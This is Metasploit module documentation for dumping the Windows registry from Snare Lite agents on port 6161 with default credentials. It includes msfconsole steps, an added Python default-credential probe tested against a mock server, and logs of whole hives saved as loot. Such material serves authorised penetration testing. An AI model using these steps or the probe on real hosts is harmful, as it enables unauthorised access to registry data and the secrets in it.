metasploit-framework/documentation/modules/auxiliary/gather/snare_registry.md


Description

This module uses the Registry Dump feature of the Snare Lite for Windows HTTP service (the agent's remote-management web interface, listening on 6161/TCP) to retrieve the Windows registry from the target host. The request is authenticated with the web interface's HTTP credentials (see the HttpUsername and HttpPassword options; the defaults are the username `snare` and a blank password), so anyone who can reach the port with those credentials can pull the registry. The Registry Dump functionality is unavailable in Snare Enterprise.

Note: The Registry Dump functionality accepts only one connected client at a time. Requesting a large key or hive causes the service to become unresponsive to other clients until the server has completed the request, so retrieving a full hive (or the entire registry with REG_DUMP_ALL) can take minutes; set TIMEOUT accordingly and avoid running several instances against the same host.

Vulnerable Application

SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.

This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.

Snare Lite for Windows is no longer supported; however, a free trial is available from the Snare Alliance website.

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/gather/snare_registry
  3. Do: set RHOST [IP]
  4. Do: set HttpUsername [USERNAME]
  5. Do: set HttpPassword [PASSWORD]
  6. Do: run
  7. You should get a copy of the default key HKLM\HARDWARE\DESCRIPTION\System from the remote Windows system, saved to the loot directory

Options

HttpUsername

The username for Snare remote access (default: snare).

HttpPassword

The password for Snare remote access (default: blank).

REG_DUMP_KEY

Retrieve the specified registry key and all of its sub-keys (default: HKLM\HARDWARE\DESCRIPTION\System, the key fetched in the verification steps). Ignored when REG_DUMP_ALL is set.

REG_DUMP_ALL

Retrieve the entire Windows registry, one hive at a time (default: false). When set, it takes precedence over REG_DUMP_KEY.

TIMEOUT

Timeout in seconds for downloading each registry key or hive. With REG_DUMP_ALL the timeout applies to each hive separately, so size it for the largest hive (HKEY_LOCAL_MACHINE in the scenarios below) rather than for the whole run.
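Because a registry dump ties up the service for every other client, it is worth confirming that the Snare web interface is reachable and that the credentials you intend to use are actually accepted before asking for a large hive. The following probe is an added example written for this page; it is not code from the Metasploit module or from Snare. The port (6161) and the default credentials (`snare` with a blank password) come from the module options above; the request path `/`, the expected `401` Basic-auth challenge and the mock server used for offline testing are assumptions made here, and the mock only imitates a Basic-auth-protected page, not Snare's real interface.

```python
"""Pre-flight probe for the Snare Lite for Windows web interface on 6161/TCP.

Added example for this page, not part of the Metasploit module or of Snare.
It checks that the remote-management HTTP service answers and whether a given
HTTP Basic credential pair is accepted, so that a large registry dump is only
requested once authentication is known to work. The mock server at the bottom
is constructed for offline testing only.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SNARE_PORT = 6161           # Snare Lite remote-management port (from the module docs)
DEFAULT_USERNAME = "snare"  # HttpUsername default
DEFAULT_PASSWORD = ""       # HttpPassword default (blank)


def basic_auth_header(username, password):
    """Build the Authorization header value for HTTP Basic authentication."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Basic " + token


def probe_snare(host, port=SNARE_PORT, username=DEFAULT_USERNAME,
                password=DEFAULT_PASSWORD, timeout=10):
    """GET / with the given credentials and classify the answer.

    Returns one of:
      "accepted"            - 200 OK, the credentials were accepted
      "rejected"            - 401 with a Basic challenge, credentials refused
      "unreachable"         - TCP connect or read failed (port closed, timeout)
      "unexpected:<status>" - anything else, left for the operator to inspect
    The path "/" and the 401/Basic challenge are assumptions, not documented
    Snare behaviour.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/", headers={
            "Authorization": basic_auth_header(username, password)})
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
    except (OSError, http.client.HTTPException):
        return "unreachable"
    finally:
        conn.close()
    if resp.status == 200:
        return "accepted"
    challenge = (resp.getheader("WWW-Authenticate") or "").lower()
    if resp.status == 401 and challenge.startswith("basic"):
        return "rejected"
    return f"unexpected:{resp.status}"


class _MockSnareHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a Basic-auth-protected web interface."""
    expected = basic_auth_header(DEFAULT_USERNAME, DEFAULT_PASSWORD)

    def do_GET(self):
        if self.headers.get("Authorization") == self.expected:
            body = b"<html>mock snare</html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="mock"')
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):  # keep the probe output quiet
        pass


def start_mock_snare(username=DEFAULT_USERNAME, password=DEFAULT_PASSWORD):
    """Start the mock on an ephemeral loopback port; return (server, port)."""
    handler = type("MockHandler", (_MockSnareHandler,),
                   {"expected": basic_auth_header(username, password)})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_mock_snare()
    try:
        print("default creds:", probe_snare("127.0.0.1", port))
        print("wrong creds:  ", probe_snare("127.0.0.1", port, password="x"))
    finally:
        server.shutdown()
        server.server_close()
```

Against a real target, call `probe_snare(target_ip)` with the same username and password you would give HttpUsername and HttpPassword; only an `accepted` result justifies a REG_DUMP_ALL run. Any other status code is reported rather than guessed at, because the page does not state how Snare Lite responds when the password is blank or when a different client already holds the dump connection.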

Scenarios

Retrieve a specific registry key:

msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
[*] Auxiliary module execution completed

Retrieve an entire hive:

msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
REG_DUMP_KEY => HKLM
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
[*] Auxiliary module execution completed

Retrieve the entire registry:

msf auxiliary(snare_registry) > set REG_DUMP_ALL true
REG_DUMP_ALL => true
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
[*] Auxiliary module execution completed